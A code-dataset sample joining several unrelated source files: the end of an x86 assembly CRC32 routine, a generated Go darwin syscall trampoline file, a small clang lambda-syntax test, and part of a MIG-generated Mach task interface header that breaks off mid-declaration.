assume CS: _TEXT
public _crc32
;-----------------------------------------------------------------------
; ulg crc32(ulg crc, ZCONST uch *buf, extent len)   -- cdecl, 32-bit flat
; In:    Arg1 = current CRC, Arg2 = data pointer, Arg3 = byte count
; Out:   eax  = updated CRC (returns 0 when buf == NULL)
; Regs:  edi = table base, esi = data cursor, eax = working CRC,
;        ecx = remaining count, ebx (and edx) scratch; all non-eax
;        registers used are saved/restored below.
;-----------------------------------------------------------------------
_crc32 proc near ; ulg crc32(ulg crc, ZCONST uch *buf, extent len)
STD_ENTRY
push edi
push esi
push ebx
push edx
push ecx
mov esi,Arg2 ; 2nd arg: uch *buf
sub eax,eax ;> if (!buf)
test esi,esi ;> return 0;
jz fine ;> else {
call _get_crc_table
mov edi,eax
mov eax,Arg1 ; 1st arg: ulg crc
IFNDEF __686
sub ebx,ebx ; ebx=0; make bl usable as a dword
ENDIF
mov ecx,Arg3 ; 3rd arg: extent len
not eax ;> c = ~crc;
test ecx,ecx
IFNDEF NO_UNROLLED_LOOPS
jz bail
IFNDEF NO_32_BIT_LOADS
; Consume bytes one at a time until esi is dword-aligned, so the main
; loop can use aligned 32-bit loads.
align_loop:
test esi,3 ; align buf pointer on next
jz SHORT aligned_now ; dword boundary
Do_CRC_byte
dec ecx
jnz align_loop
aligned_now:
ENDIF ; !NO_32_BIT_LOADS
mov SavLen,ecx ; save current len for later
shr ecx,4 ; ecx = len / 16
jz No_Sixteens
IFNDEF NO_ALIGN
; align loop head at start of 486 internal cache line !!
align 16
ENDIF
; Main unrolled loop: 16 bytes per iteration.
Next_Sixteen:
IFNDEF NO_32_BIT_LOADS
Do_CRC_4dword
ELSE ; NO_32_BIT_LOADS
Do_CRC_byteof 0
Do_CRC_byteof 1
Do_CRC_byteof 2
Do_CRC_byteof 3
Do_CRC_byteof 4
Do_CRC_byteof 5
Do_CRC_byteof 6
Do_CRC_byteof 7
Do_CRC_byteof 8
Do_CRC_byteof 9
Do_CRC_byteof 10
Do_CRC_byteof 11
Do_CRC_byteof 12
Do_CRC_byteof 13
Do_CRC_byteof 14
Do_CRC_byteof 15
add esi, 16 ; buf += 16
ENDIF ; ?NO_32_BIT_LOADS
dec ecx
jnz Next_Sixteen
No_Sixteens:
mov ecx,SavLen
and ecx,00000000FH ; ecx = len % 16
IFNDEF NO_32_BIT_LOADS
; Then whole remaining dwords ...
shr ecx,2 ; ecx = len / 4
jz SHORT No_Fours
Next_Four:
Do_CRC_dword
dec ecx
jnz Next_Four
No_Fours:
mov ecx,SavLen
and ecx,000000003H ; ecx = len % 4
ENDIF ; !NO_32_BIT_LOADS
ENDIF ; !NO_UNROLLED_LOOPS
jz SHORT bail ;> if (len)
IFNDEF NO_ALIGN
; align loop head at start of 486 internal cache line !!
align 16
ENDIF
; ... and finally the trailing 1-3 (or all, if loops not unrolled) bytes.
loupe: ;> do {
Do_CRC_byte ; c = CRC32(c,*buf++,crctab);
dec ecx ;> } while (--len);
jnz loupe
bail: ;> }
not eax ;> return ~c;
fine:
pop ecx
pop edx
pop ebx
pop esi
pop edi
STD_LEAVE
ret
_crc32 endp
_TEXT ends
;
ENDIF ; !CRC_TABLE_ONLY
ENDIF ; !USE_ZLIB
;
end
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go amd64
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
// Each stub below tail-jumps (JMP, not CALL) to the like-named C library
// symbol; the arguments are already in place per the host C ABI, and the
// tail jump lets the libc routine return directly to the Go caller.
// Generated code: the trampoline list mirrors the syscall wrappers in the
// corresponding zsyscall file. Do not hand-edit individual entries.
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_sysctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_clock_gettime_trampoline(SB),NOSPLIT,$0-0
JMP libc_clock_gettime(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify %s
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify -std=c++98 %s
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify -std=c++11 %s
// A bare lambda expression is C++11 syntax: in C++98 mode a leading '['
// cannot begin an expression, so the parser must diagnose it. The
// expected-error directive uses a line-relative offset (@-2), so no
// lines may be inserted between the lambda and the directive.
int main() {
[]{};
#if __cplusplus <= 199711L
// expected-error@-2 {{expected expression}}
#else
// expected-no-diagnostics
#endif
}
| {
"language": "Assembly"
} |
/*
 * User-side interface header for the Mach `task` subsystem. The
 * mig_external/extern guards and "Routine" stanzas indicate this file is
 * MIG-generated (Mach Interface Generator) -- presumably regenerated from
 * a task.defs; verify before hand-editing. Each routine below is a
 * client stub declaration returning kern_return_t.
 */
#ifndef _task_user_
#define _task_user_
/* Module task */
#include <string.h>
#include <mach/ndr.h>
#include <mach/boolean.h>
#include <mach/kern_return.h>
#include <mach/notify.h>
#include <mach/mach_types.h>
#include <mach/message.h>
#include <mach/mig_errors.h>
#include <mach/port.h>
/* AUTOTEST builds expose a name->function table for driving the stubs. */
#ifdef AUTOTEST
#ifndef FUNCTION_PTR_T
#define FUNCTION_PTR_T
typedef void (*function_ptr_t)(mach_port_t, char *, mach_msg_type_number_t);
typedef struct {
char *name;
function_ptr_t function;
} function_table_entry;
typedef function_table_entry *function_table_t;
#endif /* FUNCTION_PTR_T */
#endif /* AUTOTEST */
/* Number of messages in this subsystem's reply/request range. */
#ifndef task_MSG_COUNT
#define task_MSG_COUNT 35
#endif /* task_MSG_COUNT */
#include <mach/std_types.h>
#include <mach/mig.h>
#include <mach/mig.h>
#include <mach/mach_types.h>
#ifdef __BeforeMigUserHeader
__BeforeMigUserHeader
#endif /* __BeforeMigUserHeader */
#include <sys/cdefs.h>
__BEGIN_DECLS
/* Routine task_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_create
(
task_t target_task,
ledger_array_t ledgers,
mach_msg_type_number_t ledgersCnt,
boolean_t inherit_memory,
task_t *child_task
);
/* Routine task_terminate */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_terminate
(
task_t target_task
);
/* Routine task_threads */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_threads
(
task_t target_task,
thread_act_array_t *act_list,
mach_msg_type_number_t *act_listCnt
);
/* Routine mach_ports_register */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t mach_ports_register
(
task_t target_task,
mach_port_array_t init_port_set,
mach_msg_type_number_t init_port_setCnt
);
/* Routine mach_ports_lookup */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t mach_ports_lookup
(
task_t target_task,
mach_port_array_t *init_port_set,
mach_msg_type_number_t *init_port_setCnt
);
/* Routine task_info */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_info
(
task_name_t target_task,
task_flavor_t flavor,
task_info_t task_info_out,
mach_msg_type_number_t *task_info_outCnt
);
/* Routine task_set_info */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_info
(
task_t target_task,
task_flavor_t flavor,
task_info_t task_info_in,
mach_msg_type_number_t task_info_inCnt
);
/* Routine task_suspend */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_suspend
(
task_t target_task
);
/* Routine task_resume */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_resume
(
task_t target_task
);
/* Routine task_get_special_port */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_special_port
(
task_t task,
int which_port,
mach_port_t *special_port
);
/* Routine task_set_special_port */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_special_port
(
task_t task,
int which_port,
mach_port_t special_port
);
/* Routine thread_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t thread_create
(
task_t parent_task,
thread_act_t *child_act
);
/* Routine thread_create_running */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t thread_create_running
(
task_t parent_task,
thread_state_flavor_t flavor,
thread_state_t new_state,
mach_msg_type_number_t new_stateCnt,
thread_act_t *child_act
);
/* Routine task_set_exception_ports */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_exception_ports
(
task_t task,
exception_mask_t exception_mask,
mach_port_t new_port,
exception_behavior_t behavior,
thread_state_flavor_t new_flavor
);
/* Routine task_get_exception_ports */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_exception_ports
(
task_t task,
exception_mask_t exception_mask,
exception_mask_array_t masks,
mach_msg_type_number_t *masksCnt,
exception_handler_array_t old_handlers,
exception_behavior_array_t old_behaviors,
exception_flavor_array_t old_flavors
);
/* Routine task_swap_exception_ports */
/* NOTE(review): "old_handlerss" below looks like a generator typo in the
 * parameter name; harmless in a prototype, kept as generated. */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_swap_exception_ports
(
task_t task,
exception_mask_t exception_mask,
mach_port_t new_port,
exception_behavior_t behavior,
thread_state_flavor_t new_flavor,
exception_mask_array_t masks,
mach_msg_type_number_t *masksCnt,
exception_handler_array_t old_handlerss,
exception_behavior_array_t old_behaviors,
exception_flavor_array_t old_flavors
);
/* Routine lock_set_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t lock_set_create
(
task_t task,
lock_set_t *new_lock_set,
int n_ulocks,
int policy
);
/* Routine lock_set_destroy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t lock_set_destroy
(
task_t task,
lock_set_t lock_set
);
/* Routine semaphore_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t semaphore_create
(
task_t task,
semaphore_t *semaphore,
int policy,
int value
);
/* Routine semaphore_destroy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t semaphore_destroy
(
task_t task,
semaphore_t semaphore
);
/* Routine task_policy_set */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy_set
(
task_t task,
task_policy_flavor_t flavor,
task_policy_t policy_info,
mach_msg_type_number_t policy_infoCnt
);
/* Routine task_policy_get */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy_get
(
task_t task,
task_policy_flavor_t flavor,
task_policy_t policy_info,
mach_msg_type_number_t *policy_infoCnt,
boolean_t *get_default
);
/* Routine task_sample */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_sample
(
task_t task,
mach_port_t reply
);
/* Routine task_policy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy
(
task_t task,
policy_t policy,
policy_base_t base,
mach_msg_type_number_t baseCnt,
boolean_t set_limit,
boolean_t change
);
/* Routine task_set_emulation */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_emulation
(
task_t target_port,
vm_address_t routine_entry_pt,
int routine_number
);
/* Routine task_get_emulation_vector */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_emulation_vector
(
task_t task,
int *vector_start,
emulation_vector_t *emulation_vector,
mach_msg_type_number_t *emulation_vectorCnt
);
/* Routine task_set_emulation_vector */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_emulation_vector
(
task_t task,
int vector_start,
emulation_vector_t emulation_vector,
mach_msg_type_number_t emulation_vectorCnt
);
/* Routine task_set_ras_pc */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_ras_pc
(
task_t target_task,
vm_address_t basepc,
vm_address_t boundspc
);
/* Routine task_assign */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_assign
(
task_t task,
processor_set_t new_set,
boolean_t assign_threads
);
/* Routine task_assign_default */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_assign_default
(
task_t task,
boolean_t assign_threads
);
/* Routine task_get_assignment */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_assignment
(
task_t task,
processor_set_name_t *assigned_set
);
/* Routine task_set_policy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_policy
(
task_t task,
processor_set_t pset,
policy_t policy,
policy_base_t base,
mach_msg_type_number_t baseCnt,
policy_limit_t limit,
mach_msg_type_number_t limitCnt,
boolean_t change
);
/* Routine task_get_state */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_state
(
task_t task,
thread_state_flavor_t flavor,
thread_state_t old_state,
mach_msg_type_number_t *old_stateCnt
);
/* Routine task_set_state */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_state
(
task_t task,
thread_state_flavor_t flavor,
thread_state_t new_state,
mach_msg_type_number_t new_stateCnt
);
__END_DECLS
/********************** Caution **************************/
/* The following data types should be used to calculate */
/* maximum message sizes only. The actual message may be */
/* smaller, and the position of the arguments within the */
/* message layout may vary from what is presented here. */
/* For example, if any of the arguments are variable- */
/* sized, and less than the maximum is sent, the data */
/* will be packed tight in the actual message to reduce */
/* the presence of holes. */
/********************** Caution **************************/
/* typedefs for all requests */
#ifndef __Request__task_subsystem__defined
#define __Request__task_subsystem__defined
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t ledgers;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t ledgersCnt;
boolean_t inherit_memory;
} __Request__task_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_terminate_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_threads_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} __Request__mach_ports_register_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__mach_ports_lookup_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_flavor_t flavor;
mach_msg_type_number_t task_info_outCnt;
} __Request__task_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_flavor_t flavor;
mach_msg_type_number_t task_info_inCnt;
integer_t task_info_in[10];
} __Request__task_set_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_suspend_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_resume_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int which_port;
} __Request__task_get_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t special_port;
/* end of the kernel processed data */
NDR_record_t NDR;
int which_port;
} __Request__task_set_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__thread_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
